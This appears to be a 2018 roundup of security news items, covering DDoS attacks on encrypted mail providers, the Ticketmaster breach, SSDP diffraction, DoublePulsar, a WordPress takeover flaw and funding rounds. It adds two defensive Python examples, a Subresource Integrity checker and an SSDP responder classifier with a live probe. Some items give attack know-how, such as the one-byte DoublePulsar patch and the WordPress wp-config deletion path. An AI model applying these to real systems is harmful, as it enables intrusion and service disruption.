Tutanota (@TutanotaTeam), 12:37 AM, Jun 28, 2018: "We are experiencing a DDoS attack and are currently working on mitigating this. Thank you for your patience."
The Apophis Squad group is currently developing a DDoS booter service that it advertised in recent days on Twitter and on Discord. The service promises multi-vector attacks leveraging NTP, DNS, SSDP, Memcached, LDAP, HTTP, CloudFlare bypass, VSE, ARME, Torshammer, and XML-RPC.

The group has been described as Russia-based, but in a private conversation with BleepingComputer it said that this is not the case.


Ticketmaster suffered a data breach and blamed a third-party provider over the incident
29.6.2018 securityaffairs Incident

The entertainment ticketing service Ticketmaster announced it has suffered a data breach that exposed personal and payment customer information.
Hackers accessed the names, addresses, email addresses, telephone numbers, payment details and Ticketmaster login details of company customers.

According to the company, attackers installed malicious code on a customer support product hosted by Inbenta Technologies, an external third party. The compromised component was a third-party customer support chat application deployed on the UK website; through it, hackers stole personal and payment information from customers who purchased tickets.

At the time of writing there is no official figure for the extent of the incident; experts believe it may have affected tens of thousands of customers.

“On Saturday, June 23, 2018, Ticketmaster UK identified malicious software on a customer support product hosted by Inbenta Technologies, an external third-party supplier to Ticketmaster.” reads the data breach notification published by Ticketmaster.

“As soon as we discovered the malicious software, we disabled the Inbenta product across all Ticketmaster websites. Less than 5% of our global customer base has been affected by this incident. Customers in North America have not been affected.”


The ticketing service disabled the Inbenta customer support chat application on all of its websites.

Inbenta Technologies denied responsibility and blamed Ticketmaster for deploying its chat script improperly. The company explained that attackers exploited a single piece of JavaScript code that Inbenta had customized for the ticketing company, and that Ticketmaster had placed it directly on its payments page without notifying the Inbenta team.

“Upon further investigation by both parties, it has been confirmed that the source of the data breach was a single piece of JavaScript code, that was customized by Inbenta to meet Ticketmaster’s particular requirements. This code is not part of any of Inbenta’s products or present in any of our other implementations.” reads a statement published by Inbenta.

“Ticketmaster directly applied the script to its payments page, without notifying our team. Had we known that the customized script was being used this way, we would have advised against it, as it incurs greater risk for vulnerability. The attacker(s) located, modified, and used this script to extract the payment information of Ticketmaster customers processed between February and June 2018.”
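Inbenta's statement describes the core failure: a script hosted by a third party was embedded on a payments page, and the attacker changed the copy being served. Subresource Integrity (SRI) is the browser-side control for exactly that case: the page declares the script's digest in an `integrity` attribute and the browser refuses to execute a fetched file whose hash differs. The block below is an added example, not Ticketmaster's or Inbenta's code; it computes the attribute for a given script body and re-checks a fetched copy the way a browser does. The script body, URL and "tampered" copy are constructed for the example; the tampered copy only appends a comment, to show that any change at all breaks the pin.

```python
"""Pin a third-party script with Subresource Integrity (SRI).

Added example; it is not Ticketmaster's or Inbenta's code. The script body,
URL and tampered copy below are constructed.
"""
import base64
import hashlib
import hmac

SRI_ALGORITHMS = ("sha256", "sha384", "sha512")   # weakest to strongest

# Constructed stand-in for a vendor chat widget served from the vendor's host.
SCRIPT_URL = "https://chat.vendor.example/widget.js"
ORIGINAL_SCRIPT = b"window.ChatWidget = { init: function () { /* ... */ } };\n"
TAMPERED_SCRIPT = ORIGINAL_SCRIPT + b"/* modified after deployment */\n"


def sri_hash(script: bytes, algorithm: str = "sha384") -> str:
    """Return integrity metadata, e.g. 'sha384-<base64 digest>'.
    SRI uses standard (padded) base64 of the raw digest."""
    if algorithm not in SRI_ALGORITHMS:
        raise ValueError("SRI supports only %s" % ", ".join(SRI_ALGORITHMS))
    digest = hashlib.new(algorithm, script).digest()
    return "%s-%s" % (algorithm, base64.b64encode(digest).decode("ascii"))


def script_tag(url: str, integrity: str) -> str:
    """The tag to embed. crossorigin is required for SRI on cross-origin
    scripts, and the vendor must serve the file with CORS headers."""
    return '<script src="%s" integrity="%s" crossorigin="anonymous"></script>' % (
        url, integrity)


def matches_integrity(fetched: bytes, integrity: str) -> bool:
    """Check a fetched copy the way a browser does before executing it.
    The attribute may list several hashes; per the SRI spec the strongest
    algorithm present is used and any of its digests may match. Tokens with
    unknown algorithms are ignored, so a bare 'md5-...' pins nothing."""
    by_algorithm = {}
    for token in integrity.split():
        algorithm, _, expected = token.partition("-")
        if algorithm in SRI_ALGORITHMS:
            by_algorithm.setdefault(algorithm, []).append(expected)
    if not by_algorithm:
        return False
    strongest = max(by_algorithm, key=SRI_ALGORITHMS.index)
    actual = base64.b64encode(hashlib.new(strongest, fetched).digest()).decode("ascii")
    return any(hmac.compare_digest(actual, exp) for exp in by_algorithm[strongest])


if __name__ == "__main__":
    pin = sri_hash(ORIGINAL_SCRIPT)
    print(script_tag(SCRIPT_URL, pin))
    print("original accepted:", matches_integrity(ORIGINAL_SCRIPT, pin))
    print("tampered accepted:", matches_integrity(TAMPERED_SCRIPT, pin))
```

The trade-off is deliberate: a pinned script breaks the page whenever the vendor ships a new version, which on a payment page is the change control you want rather than a nuisance. SRI does nothing for inline scripts or for code the widget loads dynamically at runtime, so a restrictive Content-Security-Policy on the payment page is the complementary control.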

The ticketing service has launched an investigation to determine responsibility for the incident and is working with the authorities, as well as with financial institutions, to limit its impact.


Threat Detection Firm Cynet Raises $13 Million
28.6.2018 securityweek IT

Threat detection and response company Cynet on Wednesday announced that it raised $13 million in a Series B funding round, which brings the total raised to date to $20 million.

The funding round was led by Norwest Venture Partners, with participation from Shlomo Kramer and Ibex Investors. The firm previously raised $7 million in a Series A funding round in 2016.

Cynet says it will use the new funds to continue its growth and keep fueling the development of its products.

The company’s Cynet 360 platform, which is said to be used by organizations worldwide to protect millions of endpoints, is designed to prevent, detect and remediate any threat on the internal network, including malware, zero-day attacks, ransomware, lateral movement, and malicious insiders.

Cynet says its solution can be deployed in less than two hours and it provides security teams complete visibility into traffic and communications across tens of thousands of endpoints.

“Almost all cybersecurity solutions are built to address one vertical in the complex enterprise defense architecture,” said Dror Nahumi, general partner at Norwest Venture Partners. “However, small to medium size enterprises do not have the resources to define, select, integrate and manage dozens of products from different vendors. We are impressed with Cynet’s vision and proven customer success to enable a complete defense solution from a single platform, addressing this huge market demand.”


Significant DDoS Attack on ProtonMail Blamed on Russia-Linked Group
28.6.2018 securityweek Attack

Encrypted email provider ProtonMail was hit by a significant distributed denial-of-service (DDoS) attack that appears to have been carried out by a group linked to Russia.

ProtonMail informed customers on Wednesday morning that its network was targeted in a sustained attack. The organization said that while emails would be delayed, they were not lost as a result of the incident. Some users reported that the attack impacted the ProtonVPN VPN service as well.


Services were restored roughly three hours after the initial announcement was made.

“The attacks went on for several hours, although the outages were far more brief, usually several minutes at a time with the longest outage on the order of 10 minutes,” ProtonMail stated.

The company says it deals with DDoS attacks on a daily basis, but this attack was more significant and its DDoS protection provider, Radware, needed more time than usual to prepare mitigations.

“While we don't yet have our own measurement of the attack size, we have traced the attack back to a group that claims to have ties to Russia, and the attack is said to have been 500 Gbps, which would be among the largest DDoS's on record,” ProtonMail said in a post on Reddit.

The DDoS attack on ProtonMail may have been significant, but it does not compare to a recent attack that hit an unnamed U.S.-based service provider, which peaked at 1.7 Tbps.

A few hours after ProtonMail announced the attack, Germany-based secure email service provider Tutanota also informed users that it had been experiencing a DDoS attack, but it’s unclear if the incidents are related. Tutanota told customers that services had been restored roughly one hour later.

UPDATE. Radware told SecurityWeek that it believes the attackers are actually based in the UK, not Russia.

"We can’t confirm attack size as it varied at different points in the attack. However we can confirm that the attack was high volumetric, multi-vector attack. It included several UDP refection attacks, multiple TCP bursts, and Syn floods," Radware said.


Identity-based Threat Detection Preempt Raises $17.5 Million
28.6.2018 securityweek IT

Threat prevention firm Preempt, headquartered in San Francisco, Calif., with R&D in Ramat Gan, Israel, has raised $17.5 million in a Series B funding round supported by ClearSky, Blackstone, Intel Capital and General Catalyst. The total raised by Preempt now stands at $27.5 million, after $2 million in seed funding in 2014 and $8 million in a Series A round in 2016.

Preempt was founded in 2014 by Ajit Sancheti and Roman Blachman. It is another innovative cybersecurity firm with roots in the Israeli Defense Forces, where Blachman spent almost ten years -- four of them as a research and development manager.

Preempt focuses on providing security by preventing malicious transactions. It does this by evaluating identity, behavior, risk and context at the point of the transaction rather than only at the point of log-in. This allows, says the company, control over who can access what resources and in what context, without network segmentation or application development.

"Our mission," explains Preempt CEO and co-founder Ajit Sancheti, "is to provide a more holistic approach around securing and protecting identity within the enterprise and to make it easier for enterprises to preempt threats before they impact the business."

In a blog published Wednesday (June 27), ClearSky's operating partner and CISO, Patrick Heim wrote, "We believe that Preempt's approach -- identity as the new perimeter, identity as a cybersecurity problem-solver -- is the future."

The idea of identity being the true perimeter is a growing concept. It is no longer the firewall nor even the endpoint that should be considered the security perimeter -- it is each individual human. Earlier this month, Tessian co-founder and CTO Ed Bishop told SecurityWeek, "Our belief is that organizations' security has moved on from perimeter firewalls, and even endpoint security. I think we are in a third phase here, where humans are the real endpoints of the organization."

While Tessian concentrates on email security, Preempt concentrates on real-time network threat prevention -- but both do so based on user identity and behavior.

Preempt further allows tool and protocol containment. The misuse of network tools can be controlled, and the use of hacking tools prevented. It can deeply inspect authentication protocols such as Kerberos, NTLM, RPC and LDAP, and detect known issues such as pass-the-hash.

At the same time, all user activity can be viewed in one place, including access, behavior, history, profile, changes, locations, device, role, password strength, privileges, VPN, SSO, and more.

ClearSky's Patrick Heim is joining Preempt's board of directors. "It was exciting to see Preempt take a radical new approach to solving vulnerabilities that lie at the core of virtually all enterprises and are commonly leveraged by attackers in major breaches," he said; while adding in his blog, "It's rare that [I] get truly excited about a new security technology."

Preempt already counts Fortune 500 enterprises among its customers. The new funding is intended to help the company expand operations to accelerate product innovation and its go-to-market strategy.


SSDP Diffraction Abused for DDoS Amplification
28.6.2018 securityweek Attack

The Simple Service Discovery Protocol (SSDP) can be abused to launch a new type of distributed denial of service (DDoS) attack in which devices respond from a non-standard source port, NETSCOUT Arbor reports.

The technique, referred to as SSDP diffraction, results in UDP packets with ephemeral source and destination ports. This makes mitigation more difficult, as packet content would require inspection to filter the flood of SSDP replies and non-initial fragments.

The issue, NETSCOUT Arbor says, is that a large number of CPE (customer-premises equipment) devices use the open source library libupnp. What’s more, attackers appear to be aware of this behavior and “may choose a pool of these misbehaving victims based on the efficacy of their attack.”

Most of the roughly 5 million SSDP servers reachable via the Internet would respond from an ephemeral source port and, with SSDP diffraction attacks using such ephemeral ports able to defeat naïve port filtering mitigations, DDoS protection faces a problem, the researchers suggest in a report (PDF).

SSDP, which was designed for service discovery over a local network, uses text-based HTTP messages over UDP (also known as HTTPU) on port 1900. Devices respond both to packets whose source or destination is a multicast address (which only works on the local network) and to packets using unicast addresses (which are routed via the Internet).

SSDP-based reflection/amplification attacks became popular several years ago, but mitigation is straightforward, as the attack packets originate from a specific source port and contain an HTTPU response, while also having an ephemeral destination port from the original spoofed request.

“Almost all uses of SSDP occur on the local network, and most large organizations don’t rely on the protocol for mission-critical applications, so packets with a UDP/1900 source port can generally be filtered at network boundaries during a crisis,” NETSCOUT Arbor explains.

However, the DDoS protection firm also observed attacks able to bypass mitigations by leveraging SSDP diffraction: they would use high-numbered ports as the source and destination instead of relying solely on UDP/1900 source port HTTPU packets.

“Clearly either the attacker, or the author of the attack tool, was aware of the difference in efficacy of both the normal attack and the diffraction attack,” the researchers say.

After scanning the Internet for SSDP devices, the researchers discovered that over half of them would respond with UDP packets with a source port other than 1900.

China emerged as the country with most responding devices, both behaving (responding with a source port of 1900) and misbehaving (responding with other source ports). Russia, Vietnam, South Korea, and Venezuela are also top sources of misbehaving devices.

Further investigation revealed that libupnp (Portable SDK for UPnP Devices) might be responsible for the bad behavior: not only does it create “a new socket for responses, resulting in a new ephemeral port,” but by default it also uses a distinctive Server HTTPU header and the X-User-Agent: redsonic HTTPU header, both of which appear representative of the misbehaving set of devices.
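The distinction the report draws, a reply from UDP/1900 versus a reply from a fresh ephemeral port, is something a defender can measure directly. The block below is an added example, not NETSCOUT Arbor's tooling: it builds the unicast M-SEARCH that reflection attacks spoof, parses the HTTPU reply, and labels a responder "misbehaving" by the port the reply actually came from, recording the Server and X-User-Agent headers the report associates with libupnp builds. The two replies are constructed (header strings mimic common firmware but are not captures), and nothing touches the network unless `probe()` is called against a host you are permitted to test.

```python
"""Classify SSDP responders as behaving (reply from UDP/1900) or misbehaving
(reply from an ephemeral port, usable for SSDP diffraction).

Added example; not NETSCOUT Arbor's tooling. The sample replies are
constructed.
"""
import socket
from typing import Dict, Optional

SSDP_PORT = 1900
SSDP_MULTICAST = "239.255.255.250"


def build_msearch(host: str = SSDP_MULTICAST, mx: int = 1) -> bytes:
    """M-SEARCH request; 'ST: ssdp:all' makes every service on the device
    answer, which is why attackers favour it for amplification."""
    lines = [
        "M-SEARCH * HTTP/1.1",
        "HOST: %s:%d" % (host, SSDP_PORT),
        'MAN: "ssdp:discover"',
        "MX: %d" % mx,
        "ST: ssdp:all",
        "", "",
    ]
    return "\r\n".join(lines).encode("ascii")


def parse_httpu_response(datagram: bytes) -> Optional[Dict[str, str]]:
    """Parse an HTTPU '200 OK' reply into a dict of lower-cased headers.
    Returns None for anything else (NOTIFY, garbage, truncated status line)."""
    text = datagram.decode("utf-8", errors="replace")
    head = text.partition("\r\n\r\n")[0]
    status, _, rest = head.partition("\r\n")
    if not status.upper().startswith("HTTP/1.1 200"):
        return None
    headers = {}
    for line in rest.split("\r\n"):
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def classify_responder(src_port: int, headers: Dict[str, str]) -> Dict[str, object]:
    """'misbehaving' means the reply did not come from UDP/1900, so a
    'drop UDP sport 1900' filter at the network edge will not catch it."""
    return {
        "misbehaving": src_port != SSDP_PORT,
        "src_port": src_port,
        "server": headers.get("server", ""),
        "libupnp_like": headers.get("x-user-agent", "").lower() == "redsonic",
    }


def probe(host: str, timeout: float = 2.0) -> Dict[str, object]:
    """Live use: send one unicast M-SEARCH to a host you are allowed to test
    and classify its first reply by the port it actually came from."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.settimeout(timeout)
        sock.sendto(build_msearch(host), (host, SSDP_PORT))
        data, (_, src_port) = sock.recvfrom(65535)
    return classify_responder(src_port, parse_httpu_response(data) or {})


# Constructed replies; header values mimic common firmware strings but are not
# captures from real devices.
BEHAVING_REPLY = (b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\n"
                  b"ST: upnp:rootdevice\r\n"
                  b"USN: uuid:00000000-0000-0000-0000-000000000001::upnp:rootdevice\r\n"
                  b"SERVER: Linux/3.10 UPnP/1.0 MiniUPnPd/1.9\r\n"
                  b"LOCATION: http://192.0.2.10:5000/rootDesc.xml\r\n\r\n")
MISBEHAVING_REPLY = (b"HTTP/1.1 200 OK\r\nCACHE-CONTROL: max-age=1800\r\nST: ssdp:all\r\n"
                     b"SERVER: Linux/2.6 UPnP/1.0 Portable SDK for UPnP devices/1.6.18\r\n"
                     b"X-User-Agent: redsonic\r\n"
                     b"LOCATION: http://192.0.2.20:49152/desc.xml\r\n\r\n")

if __name__ == "__main__":
    print(classify_responder(SSDP_PORT, parse_httpu_response(BEHAVING_REPLY)))
    print(classify_responder(40321, parse_httpu_response(MISBEHAVING_REPLY)))
```

The practical consequence for mitigation follows from the classification: once a meaningful share of reflectors answer from ephemeral ports, a port-based filter is worthless and the flood has to be matched on payload (an "HTTP/1.1 200 OK" status line with ST/USN headers arriving unsolicited over UDP), which is the inspection cost the report describes.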

“Attacks will always incrementally evolve just enough to evade defenses. In this case we identified an effective new twist on an old, well-understood attack type. This revelation reminds us that defenders must constantly be aware of evolving attack methods and be as adaptable as the attackers. This specific attack highlights two trends we see time and again: old code containing bugs being re-used in new consumer products, and subsequent exposure of those vulnerable populations,” NETSCOUT Arbor concludes.


BitSight Raises $60 Million in Series D Funding Round
28.6.2018 securityweek IT

Security ratings firm BitSight today announced that it has closed a $60 million Series D funding round that brings the company’s total funding to $155 million.

Founded in 2011, BitSight's Security Ratings SaaS platform is currently used by more than 1,200 customers around the world to manage third party risk, benchmark performance, underwrite cyber insurance policies and conduct M&A due diligence.

BitSight plans to use the funding to continue its global expansion and extend its portfolio of security risk management solutions.


According to BitSight, demand for its product is increasing rapidly. In fact, cyber-security ratings are expected to become “as important as credit ratings when assessing the risk of business relationships” within the next four years, the company notes, citing a Gartner report.

Cybersecurity rating services are also expected to impact the degree to which organizations engage with other companies and should also influence the cost and availability of cyberinsurance.

“When BitSight introduced the first Security Ratings Platform in 2011, we set out to transform how businesses evaluate risk and security performance. […] there is still more work to do in continuing to establish a global standard for cyber security risk decisions,” said Tom Turner, CEO of BitSight.

“We believe there is tremendous opportunity for BitSight globally, and we look forward to working with Tom and the rest of the talented management team in the company’s next phase of growth,” Davis said.

Led by Warburg Pincus, BitSight’s new funding round received participation from existing investors Menlo Ventures, GGV Capital and Singtel Innov8. Cary Davis, Managing Director of Warburg Pincus, will join BitSight's Board of Directors.


Ops … the DoublePulsar NSA-Linked implant now works also on Windows Embedded devices
28.6.2018 securityaffairs BigBrothers

This is very bad news for the security community: the NSA-linked DoublePulsar exploit can now target Windows Embedded devices.
The DoublePulsar exploit was released publicly in April 2017 by the Shadow Brokers hackers, who allegedly stole it from the NSA.

The hackers leaked a huge trove of hacking tools and exploit code used by the US intelligence agency; most of the Windows exploits had been addressed by Microsoft the month before.

DoublePulsar is a sophisticated SMB backdoor that could allow attackers to control infected systems. Since its leak it has worked on almost any Windows system, except devices running a Windows Embedded operating system.

News of the day is that a security researcher who uses the online moniker Capt. Meelo has developed a version of the DoublePulsar exploit code that also works on devices running a Windows Embedded operating system.

The expert discovered that even though devices running a Windows Embedded operating system are vulnerable to the exploits, the relevant Metasploit modules wouldn’t work on them.

To confirm this hypothesis, the researcher used the NSA FuzzBunch exploit code and discovered that the target device was indeed vulnerable via the EternalBlue exploit.

“I then quickly used the EternalBlue module and the result was successful – the backdoor was successfully installed on the target. So I guessed the authors of the MSF exploit modules just forgot to add the support for the Windows Embedded version,” wrote the expert in a blog post.

“Since the backdoor was already installed, the last thing that needs to be done to complete the exploitation and gain a shell was to use DoublePulsar.”

Summarizing: the expert was able to run the EternalBlue attack against the target device, but the deployment of the DoublePulsar backdoor was failing, so the researcher decided to analyze the implant to discover why.

What he found was that one simple line of code was enough to make it work on Windows Embedded.

DoublePulsar was designed to check the Windows version on the target machine and take one installation path on Windows 7 or another (and perform other OS checks) on other platform iterations. However, there was no check for Windows Embedded, which generated an error message.

By simply modifying an instruction in the “Windows 7 OS Check,” the researcher was able to force the implant into taking that specific installation path.

“To do this, I went to Edit > Patch program > Change byte. Then I changed the value 74 (opcode of JZ) to 75 (opcode of JNZ). I then created a DIF file by going to File > Produce file > Create DIF file,” Capt. Meelo explains.

The expert used @stalkr_’s script (https://stalkr.net/files/ida/idadif.py) to patch the modified exe file, and then moved the modified Doublepulsar-1.3.1.exe back to its original location.

This trick allowed him to inject the generated DLL payload into the target host.


France Also Interested in Greece's Russian Bitcoin Suspect
28.6.2018 securityweek BigBrothers

France has joined the US and Russia in seeking the extradition of a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency, a court source said Wednesday.

The French warrant says Alexander Vinnik, who headed bitcoin exchange BTC-e, had defrauded over 100 people in six French cities between 2016 and 2018.

He is sought for extortion, money laundering and crimes committed online, the court source said.

Vinnik has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki. He denies the accusation.

He was indicted by a US court last year on 21 charges ranging from identity theft and facilitating drug trafficking to money laundering.

Greece's Supreme Court in December said Vinnik should be extradited to the US, but the final decision is up to the Greek justice minister.

Russia has also filed a demand to extradite Vinnik so he can stand trial on separate fraud charges.

BTC-e, founded in 2011, became one of the world's largest and most widely used digital currency exchanges.

According to the US indictment, it was "heavily reliant on criminals".

In addition, BTC-e "was noted for its role in numerous ransomware and other cyber-criminal activity".

It allegedly received more than $4 billion (3.5 billion euros) worth of Bitcoin over the course of its operation.

Vinnik was also charged with receiving funds from the infamous hack of Mt. Gox -- an earlier digital currency exchange that eventually failed, in part due to losses attributable to hacking.

The US Treasury Department has slapped BTC-e with a $110 million fine for "wilfully violating" US anti-money laundering laws. Vinnik himself has been ordered to pay $12 million.

In Russia, Vinnik is wanted on separate fraud charges totalling 9,500 euros.

He has said he would accept extradition to his home country.


Unpatched WordPress Flaw Leads to Site Takeover, Code Execution
28.6.2018 securityweek Vulnerebility

A file deletion vulnerability that remains unpatched 7 months after being reported allows for the complete takeover of WordPress sites and for arbitrary code execution.

The security flaw supposedly impacts all WordPress versions, including the latest 4.9.6 iteration. An attacker looking to exploit the issue would first have to gain privileges to edit and delete media files.

“Thus, the vulnerability can be used to escalate privileges attained through the takeover of an account with a role as low as Author, or through the exploitation of another vulnerability/misconfiguration,” RIPS Technologies’ Karim El Ouerghemmi explains.

An attacker targeting the vulnerability can delete any file of the WordPress installation, as well as any file on the server the PHP process user has permissions to delete files from. An attacker could erase an entire WordPress installation and could also circumvent security measures to execute arbitrary code on the server.

Files that can be deleted include .htaccess (which may contain security related constraints), index.php files (granting an attacker a listing of all files in the WordPress directories), and wp-config.php (which contains the database credentials).

Deleting wp-config.php triggers the WordPress installation process on the next visit to the website, which allows the attacker to undergo the installation process and use admin credentials of their choice, thus being able to execute arbitrary code on the server.

The security researcher reported the vulnerability to WordPress in November last year, via HackerOne. The WordPress security team triaged and verified the issue soon after receiving the report, but no patch has been released to date, although they apparently estimated in January that a fix would become available within six months.

A hotfix available from RIPS Technologies can be integrated by site admins into existing WordPress installations by adding it to the functions.php file of the active theme. By making sure that the data provided for the meta-value thumb does not contain code that would make path traversal possible, the hotfix prevents security-relevant files from being deleted.

“The provided fix shall ultimately be seen as a temporary fix in order to prevent attacks. We cannot oversee all possible backwards compatibility problems with WordPress plugins and advise to make any modifications to your WordPress files with caution,” RIPS Technologies notes.

Because it requires a user account, the vulnerability cannot be abused for the exploitation of arbitrary WordPress sites at scale. However, websites that share multiple user accounts should apply a hotfix, El Ouerghemmi points out.


Ping Identity Acquires API Security Firm Elastic Beam
28.6.2018 securityweek IT

Identity management solutions provider Ping Identity on Tuesday announced the acquisition of Elastic Beam, a company that specializes in detecting and blocking attacks aimed at application programming interfaces (APIs).

Ping Identity has been around since 2002 and it has raised more than $128 million. It previously acquired two other companies, UnboundID in 2016 and Accells Technologies in 2014.

The Ping Identity Platform allows enterprise users to securely access mobile, cloud and on-premises applications, while providing developers the possibility to enhance their apps with access management, single sign-on, multi-factor authentication, and data governance capabilities.

Elastic Beam emerged from stealth mode last year with a hybrid cloud software product that uses artificial intelligence (AI) to detect and neutralize threats that leverage APIs, including data exfiltration, unauthorized changes or removal of data, distributed denial-of-service (DDoS) attacks, code injections, brute force attempts and authentication via stolen credentials, API memory attacks, and WebSocket attacks.

Along with the acquisition of Elastic Beam, Ping Identity announced the launch of a new AI-driven solution designed for securing APIs.

The new product, named PingIntelligence for APIs, is currently in private preview and is expected to become generally available in the second half of 2018.

According to the company, PingIntelligence for APIs is designed to provide organizations deep visibility into how APIs are used or misused, and it delivers extensive information that can be useful for audit, compliance, and forensic reports.

“PingIntelligence for APIs applies AI models to continuously inspect and report on all API activity. It automatically discovers anomalous API traffic behavior across the enterprise. Bad actors are well versed in circumventing static security policies, so PingIntelligence for APIs was purpose-built to recognize and respond to attacks which fly under the radar of foundational API security measures, and target API vulnerabilities—without policies, rules or code,” Ping Identity described the product on its website.


Fastbooking Hack Leaves Japan Hotel Red-Faced
28.6.2018 securityweek Incindent

A Japanese hotel chain has apologised after more than 120,000 items of customer information were stolen in hacks of its reservations handled by French company Fastbooking.

Prince Hotel, a major Japanese hotel operator, said the breach occurred when hackers attacked Paris-based Fastbooking, which manages its foreign-language bookings.

A Fastbooking spokeswoman confirmed that the company had been hacked on June 14 and had not detected the attack until June 19.

"All of our markets have been affected but this represents a minority of our customers," she said.

She declined to say how many hotels were affected, but said Japanese data made up a large proportion of the hacked information.

Fastbooking, a subsidiary of French multinational AccorHotels, handles reservations for some 4,000 hotels in 40 countries.

Prince Hotel said the server for its English, Chinese and Korean-language websites was hacked twice earlier this month and a total of 124,963 items of information such as names, credit card numbers and addresses were stolen.

"There was unauthorised access to the servers of Fastbooking in France," the hotel said in a statement.

The hotel said names, home addresses, phone numbers and other personal information of customers who had booked rooms between May and June 2017 were taken, and that credit card numbers were stolen from customers who had made reservations before August 2017.

Prince Hotel president Masahiko Koyama apologised and bowed deeply at a press conference on Tuesday.

"We're deeply sorry for causing great concern and trouble," he said.

The hotel chain said it was suspending its websites until it could ensure their security.


UK Publishes Minimum Cyber Security Standard for Government Departments
28.6.2018 securityweek Cyber

The UK government's Cabinet Office has published the first iteration of its Minimum Cyber Security Standard, which will be incorporated into the Government Functional Standard for Security. The standard is mandatory for all government departments (which includes 'organizations, agencies, Arm’s Length Bodies and contractors'); but provides an excellent security checklist/framework for all commercial organizations.

It is a surprisingly short document (PDF); just seven pages comprising 10 sections under five categories: Identify, Protect, Detect, Respond and Recover. It largely follows the wider European approach of mandating outcomes rather than specific means to achieve those outcomes -- but is not entirely devoid of specific instructions.

For example, Section 6_d_iv includes, "You shall register for and use the NCSC's Web Check service." Web Check is part of the NCSC's Active Defense program. It is designed to check public sector websites for common vulnerabilities, and by this time last year was quietly scanning more than 1,200 government sites every day.

Other requirements include support for TLS v1.2, and the implementation of Domain-based Message Authentication Reporting and Conformance (DMARC) "to make email spoofing difficult".

Another requirement (6_d_i) is that departments must, "Ensure the web application is not susceptible to common security vulnerabilities, such as described in the top ten Open Web Application Security Project (OWASP) vulnerabilities." How that is ensured, like all requirements, is not specified.

For example, MFA is required (where feasible), but no specific factors or methods are described (7_b). It therefore allows for, but does not mention, evolving behavioral biometric factors.

This is by design. The document itself says, "As far as possible the security standards define outcomes, allowing Departments flexibility in how the standards are implemented, dependent on their local context."

This lack of detailed prescription is welcomed by Sanjay Kalra, co-founder and chief product officer at Lacework. "This is especially important for organizations that operate workloads in the cloud," he told SecurityWeek. "Where change is rapid and continuous, the appropriate cloud security measures require flexibility in their approach. In some ways, the Standard is similar in structure to GDPR, where the emphasis is on the outcome, but the guidelines for implementation allow for a common-sense approach that is flexible enough to allow for what works best for the organization.”

The publication is largely well-received by the security industry. Ilia Kolochenko, CEO of High-Tech Bridge (which offers its own web scanning service for both public and private industry), told SecurityWeek, "Simplicity and efficiency are successfully combined in the document. Today, many governmental entities don’t even know where and how to start cybersecurity, and this document will certainly help them structure and manage their digital risks and implement proper cybersecurity processes."

It’s also exciting to see, he added, "some simple, but clear and effective, technical requirements such as proper TLS encryption and obligatory testing of web applications for OWASP Top 10."

Matt Lock, director of sales engineers at Varonis, fears its simplicity is deceptive. "The minimum standards may sound simple on paper," he told SecurityWeek, "but even large organizations may struggle putting these steps into practice." Joseph Carson, Chief Security Scientist at Thycotic, adds, "As always, the questions for all of these standards will depend on the ability to enforce them.”

Carson also notes that securing the supply chain includes insistence that suppliers meet the UK Cyber Essentials level 6. He is somewhat concerned that the whole process could be "an indication that as the UK government prepares for the imminent Brexit, it is taking its own direction when it comes to cybersecurity. However, past incidents reveal that a cybersecurity strategy that does not extend beyond the country’s borders is doomed for failure as it assumes all cybercrime only occurs from within."

Matt Walmsley, EMEA director at Vectra, notes the document is focused on the detection of known and common threats and attacks. "The really advanced attackers are well-resourced and highly motivated. They will use previously unseen innovative attacks that use both legitimate tools and zero-day vulnerabilities and exploits which will bypass traditional signature-based defense and detection approaches."

By definition, he suspects that government departments will be targets for advanced attackers. "Given the UK government departments are likely targets for cyber-espionage, and politically motivated hacktivists as well as broader cyber-attacks, it is vital that they have the ability to detect and respond to advanced hidden attackers in short order, and with high efficacy.”

Mark Adams, regional VP, UK&I at Veeam Software, believes it is a great start for government, but government needs to do more to sell the standard across private industry. "What hope does a minimum cyber security standard have of being adhered to, outside of the government departments where it is made mandatory? Precious little, unfortunately... more must be done by the UK government to educate the private sector and make it realize that data protection and more secure data management is a necessity."

U.S. security experts have been quick to see the parallels between the UK standard and NIST's Cybersecurity Framework. “If you look at the HMG Security Policy Framework (SPF), referenced by the Minimum Cyber Security Standard," Anupam Sahai, VP product management at Santa Clara, Calif.-based Cavirin told SecurityWeek, "you’ll see that the overall structure is almost identical to the US NIST CSF -- and for good reason. The five primary functions – Identify, Protect, Detect, Respond, and Recover – are universal. Where the HMG SPF needs to go next is to map the high-level guidance to the more detailed UK-specific references, as they are mapped in the CSF. In parallel," he adds, "the UK has launched an Active Cyber Defense program, which in fact could serve as a template for the US.”

Lock also makes a comparison with the NIST framework. "The NIST Framework emphasizes the protection of data, provisioning access to a least-privilege “eyes-only” model, and continuous improvement among other key areas. And like the U.S. model, the Standard calls for continuous improvement, as organizations must be ready for the next attack.”

All told, the general consensus is favorable. The Minimum Security Standard is mandated for government, but also provides a valuable framework for private industry -- paralleling NIST in the U.S. Kolochenko sees even further value. "The UK," he said, "serves a laudable example on how cybersecurity can be and should be managed on a governmental level, that many other European countries can follow.”


Free Thanatos Ransomware Decryptor Released
28.6.2018 securityweek Ransomware

Cisco’s Talos team this week announced the availability of a free decryption tool to help victims of the Thanatos ransomware recover their files without paying the ransom.

Analysis of the threat has revealed a large number of Thanatos iterations being used by attackers, which led Talos to the conclusion that the malware is being actively developed. Unlike other ransomware families, which use Bitcoin, Thanatos asks victims to pay the ransom in the form of Bitcoin Cash (BCH), Zcash (ZEC), Ethereum (ETH) and others.

Cisco’s Talos researchers also discovered a series of issues with the malware’s encryption process, which prevents the attacker from successfully returning the data to the victim, even if the ransom was paid. “In some cases, this is intentional on the part of the distributor,” Talos reports.

Differences between the various versions of the malware are mainly observed in the ransom note, which was initially primitive, saved on the desktop as README.txt. It would only inform the victim that their files had been encrypted and demanded a payment be made to a specific Bitcoin address, the same for all victims. Apparently, payment processing was made manually and was email-based.

The next version already added support for more crypto-currencies the victims could pay the ransom with. In addition to offering support for BTC, ETH, and BCH, that malware variant also included a unique MachineID in the ransom note, and instructed victims to send it to the attacker (via email).

